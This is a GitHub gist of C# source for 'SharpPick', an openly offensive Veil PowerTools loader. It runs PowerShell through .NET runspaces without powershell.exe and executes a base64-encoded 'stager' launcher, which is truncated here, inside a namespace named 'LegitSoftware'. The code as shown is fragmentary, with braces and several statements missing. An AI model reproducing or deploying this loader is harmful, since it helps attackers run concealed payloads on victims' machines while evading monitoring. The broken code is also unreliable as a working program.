Skip to content

Instantly share code, notes, and snippets.



Last active Jan 5, 2020
What would you like to do?
* SharpPick aka InexorablePoSH
* Description: Application to load and run powershell code via the .NET assemblies
* License: 3-Clause BSD License. See Veil PowerTools Project
* This application is part of Veil PowerTools, a collection of offensive PowerShell
* capabilities. Hope they help!
* This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
using System;
using System.Text;
//Adding libraries for powershell stuff
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace LegitSoftware
class Program
static string RunPS(string cmd)
//Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
//Add commands
//Prep PS for string output and invoke
Collection<PSObject> results = pipeline.Invoke();
//Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
return stringBuilder.ToString().Trim();
static void Main()
// Base64 encoded launcher goes into the 'stager' variable
string stager = "WwBSAEUARgBdAC4AQQBTA...[SNIP]";
var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
string results = RunPS(decodedScript);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.